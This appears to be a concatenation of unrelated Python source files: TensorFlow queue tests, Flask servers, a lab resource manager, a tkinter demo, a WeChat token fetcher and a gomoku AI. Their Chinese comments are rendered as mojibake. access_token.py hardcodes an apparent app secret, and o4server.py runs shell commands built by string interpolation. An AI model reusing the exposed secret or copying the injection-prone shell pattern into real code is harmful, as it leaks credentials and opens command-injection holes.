dtypes_lib.uint8, dtypes_lib.int16, dtypes_lib.int8, dtypes_lib.int64,
dtypes_lib.bool, dtypes_lib.complex64, dtypes_lib.complex128
]
shape = (32, 4, 128)
q = data_flow_ops.PaddingFIFOQueue(32, dtypes, [shape[1:]] * len(dtypes))
input_tuple = []
for dtype in dtypes:
np_dtype = dtype.as_numpy_dtype
np_array = np.random.randint(-10, 10, shape)
if dtype == dtypes_lib.bool:
np_array = np_array > 0
elif dtype in (dtypes_lib.complex64, dtypes_lib.complex128):
np_array = np.sqrt(np_array.astype(np_dtype))
else:
np_array = np_array.astype(np_dtype)
input_tuple.append(np_array)
q.enqueue_many(input_tuple).run()
output_tuple_t = q.dequeue_many(32)
output_tuple = self.evaluate(output_tuple_t)
for (input_elem, output_elem) in zip(input_tuple, output_tuple):
self.assertAllEqual(input_elem, output_elem)
def testUnknownRank(self):
with self.assertRaisesRegexp(ValueError, "must have a defined rank"):
data_flow_ops.PaddingFIFOQueue(32, [dtypes_lib.float32],
[tensor_shape.TensorShape(None)])
class QueueFromListTest(test.TestCase):
def testQueueFromListShapes(self):
which = constant_op.constant(1)
def _cmp(expected, *shapes):
qs = [
data_flow_ops.PaddingFIFOQueue(10, [dtypes_lib.float32],
[tensor_shape.TensorShape(s)])
for s in shapes
]
s_expected = tensor_shape.TensorShape(expected)
s = data_flow_ops.QueueBase.from_list(which, qs).shapes[0]
if s_expected.ndims is None:
self.assertEqual(s_expected.ndims, s.ndims)
else:
self.assertEqual(s_expected.as_list(), s.as_list())
_cmp(None, [1, None], [None])
_cmp([None], [1], [2])
_cmp([1, None], [1, 1], [1, 2])
_cmp([1, None], [1, 1], [1, None])
_cmp([None, None], [None, 1], [1, None])
_cmp([1], [1], [1], [1])
_cmp([None], [1], [None], [1])
_cmp(None, [1, None], [1], [1])
def testQueueFromListShapesMultipleComponents(self):
q_u_u = data_flow_ops.PaddingFIFOQueue(
10, [dtypes_lib.float32, dtypes_lib.int32],
[tensor_shape.TensorShape([None]), tensor_shape.TensorShape([None])])
q_u_f = data_flow_ops.PaddingFIFOQueue(
10, [dtypes_lib.float32, dtypes_lib.int32],
[tensor_shape.TensorShape([None]), tensor_shape.TensorShape([1, 2])])
q_f_f = data_flow_ops.PaddingFIFOQueue(
10, [dtypes_lib.float32, dtypes_lib.int32],
[tensor_shape.TensorShape([3, 4]), tensor_shape.TensorShape([1, 2])])
which = constant_op.constant(1)
s_cmp_1 = data_flow_ops.QueueBase.from_list(which,
[q_u_u, q_u_u, q_u_u]).shapes
self.assertEqual([1, 1], [x.ndims for x in s_cmp_1])
self.assertEqual([None, None], [x.as_list()[0] for x in s_cmp_1])
s_cmp_2 = data_flow_ops.QueueBase.from_list(which,
[q_u_u, q_u_u, q_u_f]).shapes
self.assertEqual([1, None], [x.ndims for x in s_cmp_2])
self.assertEqual([None], s_cmp_2[0].as_list())
s_cmp_3 = data_flow_ops.QueueBase.from_list(which, [q_f_f, q_f_f]).shapes
self.assertEqual([2, 2], [x.ndims for x in s_cmp_3])
self.assertEqual([[3, 4], [1, 2]], [x.as_list() for x in s_cmp_3])
if __name__ == "__main__":
test.main()
|
webserver.py | from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "I'm alive"
def run():
app.run(host='0.0.0.0',port=8080)
def keep_alive():
t = Thread(target=run)
t.start() |
task_manager.py | """
TaskLauncher is the core module of the system,
which actually executes the tasks
"""
import re
import time
from concurrent.futures import Future
from enum import Enum, auto
from threading import Thread
from traceback import print_exc
from typing import Union, Dict, Optional, Type, List, Any, cast
import dill
from bson import ObjectId
from pydantic import BaseModel, root_validator
from .device_view import DeviceView
from .device_view.device import BaseDevice
from .sample_view import SampleView
from .sample_view.sample_view import SamplePositionRequest
from .task_actor import run_task
from .task_view.task_view import TaskView
from .utils.data_objects import get_collection
from .utils.module_ops import load_definition
_SampleRequestDict = Union[str, Dict[str, Union[str, int]]]
_ResourceRequestDict = \
Dict[Optional[Type[BaseDevice]], List[_SampleRequestDict]] # the raw request sent by task process
_EXTRA_REQUEST: str = "__extras"
class RequestStatus(Enum):
"""
The status for a request. It will be stored in the database
"""
PENDING = auto()
FULFILLED = auto()
NEED_RELEASE = auto()
RELEASED = auto()
CANCELED = auto()
ERROR = auto()
class ResourcesRequest(BaseModel):
"""
This class is used to validate the resource request. Each request should have a format of
[DeviceType: List of SamplePositionRequest]
See Also:
:py:class:`SamplePositionRequest <alab_management.sample_view.sample_view.SamplePositionRequest>`
"""
__root__: Dict[str, List[SamplePositionRequest]] # type: ignore
@root_validator(pre=True, allow_reuse=True)
def preprocess(cls, values): # pylint: disable=no-self-use,no-self-argument
values = values["__root__"]
# if the sample position request is string, we will automatically add a number attribute = 1.
values = {k: [SamplePositionRequest.from_str(v_)
if isinstance(v_, str) else v_
for v_ in v] for k, v in values.items()}
return {"__root__": values}
class RequestMixin:
"""
Simple wrapper for the request collection
"""
def __init__(self):
self._request_collection = get_collection("requests")
def update_request_status(self, request_id: ObjectId, status: RequestStatus):
return self._request_collection.update_one({"_id": request_id}, {"$set": {
"status": status.name
}})
def get_request(self, request_id: ObjectId, **kwargs):
return self._request_collection.find_one({"_id": request_id}, **kwargs)
def get_request_with_status(self, status: RequestStatus):
return self._request_collection.find({"status": status.name})
class TaskManager(RequestMixin):
"""
TaskManager will
(1) find all the ready tasks and submit them,
(2) handle all the resource requests
"""
def __init__(self):
load_definition()
self.task_view = TaskView()
self.sample_view = SampleView()
self.device_view = DeviceView()
super().__init__()
time.sleep(1) # allow some time for other modules to launch
def run(self):
"""
Start the loop
"""
while True:
self._loop()
time.sleep(0.5)
def _loop(self):
self.submit_ready_tasks()
self.handle_released_resources()
self.handle_requested_resources()
def submit_ready_tasks(self):
"""
Checking if there are any tasks that are ready to be submitted. (STATUS = READY)
If so, submit them to task actor (dramatiq worker).
"""
ready_task_entries = self.task_view.get_ready_tasks()
for task_entry in ready_task_entries:
run_task.send(task_id_str=str(task_entry["task_id"]))
def handle_released_resources(self):
"""
Release the resources.
"""
for request in self.get_request_with_status(RequestStatus.NEED_RELEASE):
devices = request["assigned_devices"]
sample_positions = request["assigned_sample_positions"]
self._release_devices(devices)
self._release_sample_positions(sample_positions)
self.update_request_status(request_id=request["_id"], status=RequestStatus.RELEASED)
def handle_requested_resources(self):
"""
Check if there are any requests that are in PENDING status. If so,
try to assign the resources to it.
"""
# TODO: add priority here (some sort function)
for request in self.get_request_with_status(RequestStatus.PENDING):
self._handle_requested_resources(request)
def _handle_requested_resources(self, request_entry: Dict[str, Any]):
try:
resource_request = request_entry["request"]
task_id = request_entry["task_id"]
devices = self.device_view.request_devices(task_id=task_id, device_types_str=[
device_type for device_type in resource_request.keys()
if device_type != _EXTRA_REQUEST
])
# some devices are not available now
# the request cannot be fulfilled
if devices is None:
return
# replace device placeholder in sample position request
# and make it into a single list
parsed_sample_positions_request = []
for device_type, device in devices.items():
device_name = device["name"]
parsed_sample_positions_request.extend([
{**sample_position_request,
"prefix": re.sub(r"\$", device_name, sample_position_request["prefix"])} # type: ignore
for sample_position_request in resource_request[device_type]])
if any("$" in sample_position_request["prefix"]
for sample_position_request in resource_request.get(_EXTRA_REQUEST, [])):
raise ValueError("$ should not appear under `None`, which is actually not a device.")
parsed_sample_positions_request.extend(resource_request.get(_EXTRA_REQUEST, []))
sample_positions = self.sample_view.request_sample_positions(
task_id=task_id,
sample_positions=[SamplePositionRequest(**request) for request in parsed_sample_positions_request],
)
if sample_positions is None:
return
# in case some errors happen, we will raise the error in the task process instead of the main process
except Exception as error: # pylint: disable=broad-except
self._request_collection.update_one({"_id": request_entry["_id"]}, {"$set": {
"status": RequestStatus.ERROR.name,
"error": dill.dumps(error),
"assigned_devices": None,
"assigned_sample_positions": None,
}})
return
# if both devices and sample positions can be satisfied
self._request_collection.update_one({"_id": request_entry["_id"]}, {"$set": {
"assigned_devices": devices,
"assigned_sample_positions": sample_positions,
"status": RequestStatus.FULFILLED.name,
}})
# label the resources as occupied
self._occupy_devices(devices=devices, task_id=task_id)
self._occupy_sample_positions(sample_positions=sample_positions, task_id=task_id)
def _occupy_devices(self, devices: Dict[str, Dict[str, Any]], task_id: ObjectId):
for device in devices.values():
self.device_view.occupy_device(device=cast(str, device["name"]), task_id=task_id)
def _occupy_sample_positions(self, sample_positions: Dict[str, List[Dict[str, Any]]], task_id: ObjectId):
for sample_positions_ in sample_positions.values():
for sample_position_ in sample_positions_:
self.sample_view.lock_sample_position(task_id, cast(str, sample_position_["name"]))
def _release_devices(self, devices: Dict[str, Dict[str, Any]]):
for device in devices.values():
if device["need_release"]:
self.device_view.release_device(device["name"])
def _release_sample_positions(self, sample_positions: Dict[str, List[Dict[str, Any]]]):
for sample_positions_ in sample_positions.values():
for sample_position in sample_positions_:
if sample_position["need_release"]:
self.sample_view.release_sample_position(sample_position["name"])
class ResourceRequester(RequestMixin):
"""
Class for request lab resources easily. This class will insert a request into the database,
and then the task manager will read from the database and assign the resources.
It is used in :py:class:`~alab_management.lab_view.LabView`.
"""
def __init__(self, task_id: ObjectId):
self._request_collection = get_collection("requests")
self._waiting: Dict[ObjectId, Dict[str, Any]] = {}
self.task_id = task_id
super().__init__()
self._thread = Thread(target=self._check_request_status_loop)
self._thread.daemon = True
self._thread.start()
def request_resources(self, resource_request: _ResourceRequestDict,
timeout: Optional[float] = None) -> Dict[str, Any]:
"""
Request lab resources. Write the request into the database, and then the task manager will read from the
database and assign the resources.
"""
f = Future()
formatted_resource_request = {device_type.__name__: samples for device_type, samples in resource_request.items()
if device_type is not None}
if None in resource_request:
formatted_resource_request[_EXTRA_REQUEST] = resource_request[None]
if not isinstance(formatted_resource_request, ResourcesRequest):
formatted_resource_request = ResourcesRequest(__root__=formatted_resource_request) # type: ignore
formatted_resource_request = formatted_resource_request.dict()["__root__"]
result = self._request_collection.insert_one({"request": formatted_resource_request,
"status": RequestStatus.PENDING.name,
"task_id": self.task_id})
_id: ObjectId = cast(ObjectId, result.inserted_id)
self._waiting[_id] = {
"f": f,
"raw_request": resource_request,
}
try:
result = f.result(timeout=timeout)
except TimeoutError:
# cancel the task
self.update_request_status(request_id=_id, status=RequestStatus.CANCELED)
raise
return {
**self._post_process_requested_resource(
devices=result["devices"],
sample_positions=result["sample_positions"],
resource_request=formatted_resource_request
),
"request_id": result["request_id"],
}
def release_resources(self, request_id: ObjectId) -> bool:
"""
Release a request by request_id
"""
result = self._request_collection.update_one({
"_id": request_id,
"status": RequestStatus.FULFILLED.name,
}, {"$set": {
"status": RequestStatus.NEED_RELEASE.name,
}})
return result.modified_count == 1
def _check_request_status_loop(self):
while True:
try:
for request_id in self._waiting.copy().keys():
status = self.get_request(request_id=request_id, projection=["status"])["status"] # type: ignore
if status == RequestStatus.FULFILLED.name:
self._handle_fulfilled_request(request_id=request_id)
elif status == RequestStatus.ERROR.name:
self._handle_error_request(request_id=request_id)
except Exception:
print_exc() # for debugging in the test
raise
time.sleep(0.5)
def _handle_fulfilled_request(self, request_id: ObjectId):
entry = self.get_request(request_id)
if entry["status"] != RequestStatus.FULFILLED.name: # type: ignore
return
assigned_devices: Dict[str, Dict[str, Union[str, bool]]] = entry["assigned_devices"] # type: ignore
assigned_sample_positions: Dict[str, List[Dict[str, Any]]] = entry["assigned_sample_positions"] # type: ignore
request: Dict[str, Any] = self._waiting.pop(request_id)
f: Future = request["f"]
raw_request = request["raw_request"]
device_str_to_type: Dict[str, Type[BaseDevice]] = {device_type.__name__: device_type
for device_type in raw_request if device_type is not None}
f.set_result({
"devices": {device_str_to_type[device_type_str]: device_dict["name"]
for device_type_str, device_dict in assigned_devices.items()},
"sample_positions": {name: [sample_position["name"] for sample_position in sample_positions_list]
for name, sample_positions_list in assigned_sample_positions.items()},
"request_id": request_id,
})
def _handle_error_request(self, request_id: ObjectId):
entry = self.get_request(request_id)
if entry["status"] != RequestStatus.ERROR.name: # type: ignore
return
error: Exception = dill.loads(entry["error"]) # type: ignore
request: Dict[str, Any] = self._waiting.pop(request_id)
f: Future = request["f"]
f.set_exception(error)
@staticmethod
def _post_process_requested_resource(devices: Dict[Type[BaseDevice], str], sample_positions: Dict[str, List[str]],
resource_request: Dict[str, List[Dict[str, Union[int, str]]]]):
processed_sample_positions: Dict[Optional[Type[BaseDevice]], Dict[str, List[str]]] = {}
for device_type, device_str in devices.items(): # type: ignore
sample_position_requests = resource_request[device_type.__name__]
processed_sample_positions[device_type] = {
cast(str, sample_position_request["prefix"]): sample_positions.pop(
cast(str, sample_position_request["prefix"]).replace("$", device_str))
for sample_position_request in sample_position_requests
}
if _EXTRA_REQUEST in resource_request:
processed_sample_positions[None] = {
cast(str, sample_position_request["prefix"]):
sample_positions.pop(cast(str, sample_position_request["prefix"]))
for sample_position_request in resource_request[_EXTRA_REQUEST]
}
return {
"devices": devices,
"sample_positions": processed_sample_positions,
}
|
Control_Frameworks_NOT_working.py | '''
May 2017
@author: Burkhard A. Meier
'''
#==================================================================
import tkinter as tk
from tkinter import ttk
from tkinter import scrolledtext
from threading import Thread
win = tk.Tk()
win.title("Python GUI")
aLabel = ttk.Label(win, text="A Label")
aLabel.grid(column=0, row=0)
ttk.Label(win, text="Enter a name:").grid(column=0, row=0)
name = tk.StringVar()
nameEntered = ttk.Entry(win, width=12, textvariable=name)
nameEntered.grid(column=0, row=1)
ttk.Label(win, text="Choose a number:").grid(column=1, row=0)
number = tk.StringVar()
numberChosen = ttk.Combobox(win, width=12, textvariable=number)
numberChosen['values'] = (1, 2, 4, 42, 100)
numberChosen.grid(column=1, row=1)
numberChosen.current(0)
scrolW = 30
scrolH = 3
scr = scrolledtext.ScrolledText(win, width=scrolW, height=scrolH, wrap=tk.WORD)
scr.grid(column=0, sticky='WE', columnspan=3)
nameEntered.focus()
#==================================================================
# NOT working - CRASHES Python -----------------------------------
def wxPythonApp():
import wx
app = wx.App()
frame = wx.Frame(None, -1, "wxPython GUI", size=(200,150))
frame.SetBackgroundColour('white')
frame.CreateStatusBar()
menu= wx.Menu()
menu.Append(wx.ID_ABOUT, "About", "wxPython GUI")
menuBar = wx.MenuBar()
menuBar.Append(menu,"File")
frame.SetMenuBar(menuBar)
frame.Show()
app.MainLoop()
def tryRunInThread():
runT = Thread(target=wxPythonApp)
runT.setDaemon(True)
runT.start()
print(runT)
print('createThread():', runT.isAlive())
action = ttk.Button(win, text="Call wxPython GUI", command=tryRunInThread)
action.grid(column=2, row=1)
#-----------------------------------------------------------------
#======================
# Start GUI
#======================
win.mainloop() |
o4server.py | #!/usr/bin/env python3
import sys
import os
import time
import logging
import contextlib
from multiprocessing import Pool, Manager
from subprocess import check_output, CalledProcessError
import json
from flask import Flask, request, send_file, redirect, abort, make_response
from flask.logging import default_handler
import o4package
LOG_FORMAT = '[%(asctime)s] remote_addr=%(remote_addr)s forwarded=%(forwarded)s %(message)s'
class RequestFormatter(logging.Formatter):
def format(self, record):
record.remote_addr = getattr(request, 'remote_addr', '-')
record.forwarded = request.environ.get('http_x_forwarded_for', 'not-forwarded')
return super().format(record)
formatter = RequestFormatter(LOG_FORMAT)
default_handler.setFormatter(formatter)
app = Flask(__name__)
workers = None
app.logger.setLevel(logging.INFO)
shared = Manager().dict() # Object shared among all workers
if 'O4_LOG' in os.environ:
o4_log = open(os.environ['O4_LOG'], 'at')
else:
o4_log = sys.stdout
def url(content_type, changelist, depot):
depot = depot.replace('//', '')
return f'/o4-http/{content_type}/{changelist}/{depot}'
def uncached(status, body, headers={}):
resp = make_response(body, status)
for k, v in headers.items():
resp.headers[k] = v
resp.headers['Cache-Control'] = 'no-cache'
return resp
@app.route('/o4-http/help')
def help():
return send_file('o4server.txt', mimetype='text/plain')
@app.route('/o4-http/p4password', methods=['POST'])
def change_password():
if request.content_type != 'application/json':
abort(401, 'Content type must be json')
j = request.get_json()
prev = j.get('previous-password')
if prev != os.environ['P4PASSWD']:
abort(403, '')
new = j.get('new-password')
if not new:
abort(403, '')
os.environ['P4PASSWD'] = new
try:
out = check_output(['p4', 'counter', 'change'])
app.logger.info('Perforce password changed by request')
shared['p4password'] = new
return uncached(204, '')
except Exception as e:
os.environ['P4PASSWD'] = prev
app.logger.info(f'Problem checking new password: {e}')
return uncached(400, '')
@contextlib.contextmanager
def log_time(operation, changelist, depot):
redir_cl = None
ctx = {}
start = time.time()
yield ctx
stop = time.time()
changelist = f'@{changelist}' if changelist else ''
msg = f'op={operation} object={depot}{changelist} elapsed={stop-start:.3f}'
if 'redir_cl' in ctx:
msg += f' redir={ctx["redir_cl"]}'
now = time.strftime('%Y-%m-%dT%H:%M:%SZ', time.gmtime())
o4_log.write(f'{now} {msg}\n')
o4_log.flush()
@app.route(url('fstat', '<int:changelist>', '<path:depot>'))
def get_fstat(changelist, depot):
with log_time('fstat', changelist, depot) as ctx:
nearby = request.args.get('nearby')
if nearby:
nearby = int(nearby)
status, fstat = workers.apply(o4package.get_fstat, ('//' + depot, changelist, nearby))
if status == 200:
return send_file(fstat,
mimetype='application/gzip',
as_attachment=True,
attachment_filename=os.path.basename(fstat))
if status // 100 == 3:
fstat = os.path.basename(fstat)
ctx['redir_cl'] = redir_cl = fstat.partition('.')[0]
return redirect(url('fstat', int(redir_cl), depot), status)
abort(404)
@app.route(url('archive', '<int:changelist>', '<path:depot>'))
def get_archive(changelist, depot):
with log_time('archive', changelist, depot) as ctx:
nearby = request.args.get('nearby')
if nearby:
nearby = int(nearby)
code, archive = workers.apply(o4package.get_archive, ('//' + depot, changelist, nearby))
if code // 100 == 3:
archive = os.path.basename(archive)
ctx['redir_cl'] = redir_cl = archive.partition('.')[0]
return redirect(url('archive', int(redir_cl), depot), code)
if archive:
return send_file(archive,
mimetype='application/gzip',
as_attachment=True,
attachment_filename=os.path.basename(archive))
if code == 202:
return 'In progress', 202
abort(code)
@app.route('/o4-http/changelists/<path:depot>')
def get_changelists(depot):
with log_time('get_changelists', None, depot):
changelists = workers.apply(o4package.get_available_changelists, ('//' + depot,))
format = request.headers.get('accept', 'text/plain')
if format == 'text/html':
body = '<ol><li>' + '</li><li>'.join(changelists) + '</li></ol>'
elif format == 'application/json':
body = json.dumps(changelists)
else:
body = '\n'.join(changelists) + '\n'
return uncached(200, body)
def purge():
'''
A never-returning function that periodically removes fstat and archive
files if need be.
'''
from random import shuffle
import o4_config
import o4_fstat
max_single_dir = o4_config.maximum_o4_dir_size()
keep_free = o4_config.minimum_disk_free()
if not max_single_dir and not keep_free:
return
def purge_all(o4dirs):
cmd = "df -k . | tail -1 | awk '{print $4}'"
pa = o4_fstat.prune_archive_cache
pf = o4_fstat.prune_fstat_cache
for prune, dir in [(pa, d) for d in o4dirs] + [(pf, d) for d in o4dirs]:
out = check_output(cmd, shell=True, encoding=sys.stdout.encoding)
free = int(out.strip()) * 1024
if free < keep_free:
prune(dir)
else:
break
def purge_one(d):
cmd = f"du -sk {d} | awk '{{print $1}}'"
out = check_output(cmd, shell=True, encoding=sys.stdout.encoding)
used = int(out.strip()) * 1024
if used > max_single_dir:
o4_fstat.prune_archive_cache(d)
out = check_output(cmd, shell=True, encoding=sys.stdout.encoding)
used = int(out.strip()) * 1024
if used > max_single_dir:
o4_fstat.prune_fstat_cache(d)
while True:
time.sleep(60)
o4dirs = o4package.o4locations()
shuffle(o4dirs)
if keep_free:
purge_all(o4dirs)
if max_single_dir:
for d in o4dirs:
purge_one(d)
if __name__ == '__main__':
import threading
threading.Thread(target=purge, daemon=True).start()
os.environ['NOO4SERVER'] = 'true'
shared['p4password'] = os.environ['P4PASSWD']
def share(*args):
o4package.shared = args[0]
workers = Pool(processes=4, initializer=share, initargs=(shared,))
try:
app.run(host='0.0.0.0')
except:
workers.close()
workers.join()
|
access_token.py | import urllib.request
import time
import json
import threading
class AccssToken():
def __init__(self):
self.appId = 'wxff3cfebbdcbcd135'
self.appScrect = 'b9774614f15c56e6e42884ff84ee5168'
self.__accessToken = ''
self.__time = 0
def get_accessToken(self):
return self.__accessToken
def __real_get_accessToken(self):
while(True):
try:
postUrl = "https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid=%s&secret=%s" % (self.appId, self.appScrect)
urlResp = urllib.request.urlopen(postUrl)
urlResp = json.loads(urlResp.read().decode('utf-8'))
self.__accessToken = urlResp['access_token']
except :
pass
print('ๅฎๆถ่ทๅ่ทๅaccessToken'+self.__accessToken)
# ไป็จๅบๅฏๅจๅผๅง๏ผๅฐฑไธ็ด้7000็ง่ทๅไธๆฌกaccess_token
time.sleep(240)
# ไป็จๅบๅฏๅจๅผๅง๏ผๆฐๅผไธๆก็บฟ็จๅปๅฏๅจ่ทๅaccess_token
def loop_getAccessToken(self):
t = threading.Thread(target=self.__real_get_accessToken,name='loop_getAccessToken')
t.start()
# t.end()
# self.__real_get_accessToken()
|
FAI.py | import random
import copy
from tkinter import *
import tkinter.messagebox
import tkinter.font as tkFont
import threading
import time
import requests
import json
from base_logger import getLogger
# โโโข
# ็ฎๆณ้จๅ
class FAI:
def __init__(self, w: int, h: int, P1='โโโข'):
self.CODE_P1 = 'โ'
self.CODE_P2 = 'โ'
self.CODE_BLANK = 'ใ'
self.P1 = 1
self.P2 = 2
self.BLANK = 0
# self.CODE_P1 = ' 1 '
# self.CODE_P2 = ' 2 '
# self.CODE_BLANK = ' 0 '
# self.CODE_P1 = 'โ'
# self.CODE_P2 = 'โ'
# self.CODE_BLANK = '.'
self.CODE = {0: self.CODE_BLANK, 1: self.CODE_P1, 2: self.CODE_P2}
self.w = w
self.h = h
# ไบๅญๆฃ
self.WIN_COUNT = 5
# ๅฅๆช็ๆฐ็ปๅฎไนๆนๅผ...Python็ๅฏน่ฑกๆฏ็ดๆฅๆท่ดไฝฟ็จ็
self.map = [[0 for i in range(w)] for i in range(h)]
# ๅฎไน่ฎก็ฎๆๅผ็ๆถๅ็จ็
self.weights = {
self.P1: {
" 1 ": 1,
" 11 ": 2,
" 111 ": 3,
" 1111 ": 3,
" 12": 0,
" 112": 1,
" 1112": 2,
" 11112": 3,
},
self.P2: {
" 2 ": 1,
" 22 ": 2,
" 222 ": 3,
" 2222 ": 3,
" 21": 0,
" 221": 1,
" 2221": 2,
" 22221": 3,
},
}
def __str__(self):
res = self.CODE_BLANK * self.w + self.CODE_BLANK * 2 + '\n'
for y in self.map:
res = res + self.CODE_BLANK
for x in y:
res = res + self.CODE[x]
res = res + self.CODE_BLANK + '\n'
res = res + self.CODE_BLANK * self.w + self.CODE_BLANK * 2
return res
def get_char(self, x=0, y=0):
try:
res = self.CODE[self.map[y][x]]
except KeyError as e:
res = self.CODE[0]
print('get_char ERR:', y, x)
print(self.map)
return res
def put(self, x: int, y: int, val: int):
if self.map[y][x] == self.P1 or self.map[y][x] == self.P2:
return False
self.map[y][x] = val
return True
# ๆฃๆตๅชไฝ็ฉๅฎถ่ตขไบ
def win(self, player=0):
if player == 0:
if self.win(player=self.P1) is True:
return self.P1
if self.win(player=self.P2) is True:
return self.P2
# ๆฒกๆๅๅบ่่ด
return 0
# ๆฃๆฅๆจช่ก
for y in self.map:
# ๅๅไฝๆ็็ๆฃๆฅๆนๅผ
if player not in y:
continue
for i in range(len(y)):
if y[i] == player:
check = y[i:i + 5]
if self.BLANK not in check:
if player == self.P1 and self.P2 not in check and len(check) == 5:
return True
if player == self.P2 and self.P1 not in check and len(check) == 5:
return True
# ๆฃๆฅๅ
for i in range(self.w):
x = []
for y in self.map:
x.append(y[i])
# ๅๅไฝๆ็็ๆฃๆฅๆนๅผ*2
if player not in x:
continue
for j in range(len(x)):
if x[j] == player:
check = x[j:j + 5]
if self.BLANK not in check:
if player == self.P1 and self.P2 not in check and len(check) == 5:
return True
if player == self.P2 and self.P1 not in check and len(check) == 5:
return True
# ๆฃๆฅ"\\"ๅ๏ผไปๅทฆไธ่งๅผๅง
for i in range(self.w):
x = []
for yi in range(len(self.map)):
if i + yi < self.w:
x.append(self.map[yi][i + yi])
# ๅๅไฝๆ็็ๆฃๆฅๆนๅผ*3
if player not in x:
continue
for j in range(len(x)):
if x[j] == player:
check = x[j:j + 5]
if self.BLANK not in check:
if player == self.P1 and self.P2 not in check and len(check) == 5:
return True
if player == self.P2 and self.P1 not in check and len(check) == 5:
return True
# ๆฃๆฅ"\\"ๅ๏ผไปๅทฆไธ่งๅผๅง๏ผๅฐๅทฆไธ่ง๏ผ
for i in range(self.h):
x = []
for xi in range(self.w):
if i + xi < self.h:
x.append(self.map[i][i + xi])
# ๅๅไฝๆ็็ๆฃๆฅๆนๅผ*4
if player not in x:
continue
for j in range(len(x)):
if x[j] == player:
check = x[j:j + 5]
if self.BLANK not in check:
if player == self.P1 and self.P2 not in check and len(check) == 5:
return True
if player == self.P2 and self.P1 not in check and len(check) == 5:
return True
# ๆฃๆฅ"//"ๅ๏ผไปๅทฆไธ่งๅผๅง
for i in range(self.w):
x = []
for yi in range(len(self.map)):
if 0 <= i - yi < self.w:
x.append(self.map[yi][i - yi])
# ๅๅไฝๆ็็ๆฃๆฅๆนๅผ*5
if player not in x:
continue
for j in range(len(x)):
if x[j] == player:
check = x[j:j + 5]
if self.BLANK not in check:
if player == self.P1 and self.P2 not in check and len(check) == 5:
return True
if player == self.P2 and self.P1 not in check and len(check) == 5:
return True
# ๆฃๆฅ"//"ๅ๏ผไปๅทฆไธ่งๅผๅง๏ผๅฐๅทฆไธ่ง๏ผ
for i in range(self.h):
x = []
for xi in range(self.w):
if 0 <= i - xi < self.h:
x.append(self.map[i][i - xi])
# ๅๅไฝๆ็็ๆฃๆฅๆนๅผ*6
if player not in x:
continue
for j in range(len(x)):
if x[j] == player:
check = x[j:j + 5]
if self.BLANK not in check:
if player == self.P1 and self.P2 not in check and len(check) == 5:
return True
if player == self.P2 and self.P1 not in check and len(check) == 5:
return True
return False
def play(self, player: int):
weights = [[0 for i in range(self.w)] for i in range(self.h)]
maps = self.__str__().split('\n')
# for iy in range(len(maps)):
# # ๆฃๆฅๆจชๅ๏ผไปๅทฆๅฐๅณ
# y = maps[iy]
# for ix in range(len(y)):
# for k in self.weights[player]:
# if y[ix:].startswith(k):
# weights[iy - 1][ix + 1] = weights[iy - 1][ix + 1] + self.weights[player][k]
# # ๆฃๆฅๆจชๅ๏ผไปๅณๅฐๅทฆ
# y = maps[iy][::-1]
# for ix in range(len(y)):
# for k in self.weights[player]:
# if y[ix:].startswith(k):
# weights[iy - 1][self.w - (ix + 2)] = weights[iy - 1][self.w - (ix + 2)] + self.weights[player][k]
#
# for ix in range(len(maps[0])):
# y = ''
# for iy in range(len(maps)):
# y = y + maps[iy][ix]
#
# # ๆฃๆฅ็ซๅ๏ผไปไธๅฐไธ
# for iy in range(len(y)):
# for k in self.weights[player]:
# if y[iy:].startswith(k):
# weights[iy - 1][ix - 1] = weights[iy - 1][ix - 1] + self.weights[player][k]
#
# y = y[::-1]
# # ๆฃๆฅ็ซๅ๏ผไปไธๅฐไธ
# for iy in range(len(y)):
# for k in self.weights[player]:
# if y[iy:].startswith(k):
# weights[self.h - (iy - 0)][ix - 1] = weights[self.h - (iy - 0)][ix - 1] + self.weights[player][k]
# \\ๆๅ๏ผไปๅทฆไธ่งๅฐๅณไธ่ง
for ix in range(len(maps[0])):
y = ''
for iy in range(len(maps)):
if ix + iy < len(maps[0]):
y = y + maps[iy][ix + iy]
# ๆฃๆฅ\\ๅ๏ผไปไธๅฐไธ
for iy in range(len(y)):
for k in self.weights[player]:
if y[iy:].startswith(k):
if ix + iy < len(maps[0]):
weights[iy - 1][ix + iy - 1] = weights[iy - 1][ix + iy - 1] + self.weights[player][k]
y = y[::-1]
# ๆฃๆฅ็ซๅ๏ผไปไธๅฐไธ
for iy in range(len(y)):
for k in self.weights[player]:
if y[iy:].startswith(k):
if ix + iy < len(maps[0]):
weights[self.h - (iy - 0)][self.w - (ix + iy + 0)] = weights[self.h - (iy - 0)][self.w - (ix + iy + 0)] \
+ self.weights[player][k]
# \\ๆๅ๏ผไปๅทฆไธ่งๅฐๅทฆไธ่ง
for iy in range(len(maps)):
y = ''
for ix in range(len(maps[0])):
if ix + iy < len(maps[0]):
y = y + maps[iy][ix + iy]
# ๆฃๆฅ\\ๅ๏ผไปไธๅฐไธ
for ix in range(len(y)):
for k in self.weights[player]:
if y[ix:].startswith(k):
if ix + iy < len(maps[0]):
weights[iy - 1][ix + iy - 1] = weights[iy - 1][ix + iy - 1] + self.weights[player][k]
# y = y[::-1]
# # ๆฃๆฅ็ซๅ๏ผไปไธๅฐไธ
# for iy in range(len(y)):
# for k in self.weights[player]:
# if y[iy:].startswith(k):
# if ix + iy < len(maps[0]):
# weights[self.h - (iy - 0)][self.w - (ix + iy + 0)] = weights[self.h - (iy - 0)][
# self.w - (ix + iy + 0)] \
# + self.weights[player][k]
for w in weights:
print(w)
class FAINetwork:
def __init__(self):
self.API_MAIN = 'https://lance-go-online.herokuapp.com/'
self.API1 = 'https://lance-go-online.herokuapp.com/play/'
self.API2 = 'https://lance-go-online.herokuapp.com/playing/'
def wakeup(self, timeout: float = 30):
try:
r = requests.get(self.API_MAIN, timeout=timeout)
except requests.exceptions.ConnectTimeout:
return False
if r.status_code != 200:
return False
return True
def get_data(self, code: str):
r = requests.get(self.API2 + code)
if r.status_code != 200:
return ''
return r.text
def get_result(self, code: str):
r = requests.get(self.API1 + code)
if r.status_code != 200:
return {"code": code, "data": "", "error": "Server Error", "status": 0, "uptime": 0, "winner": 0}
try:
js = json.loads(r.text)
except json.decoder.JSONDecodeError:
return {"code": code, "data": "", "error": "Server Error", "status": 0, "uptime": 0, "winner": 0}
return js
def post_result(self, code: str, player: int, action: str = 'put', data: str = None, winner: int = 0, size: str = None):
params = {'action': action, 'player': player, 'winner': winner}
if size is not None:
params['size'] = size
if data is not None:
params['data'] = data
r = requests.post(self.API1 + code, data=params)
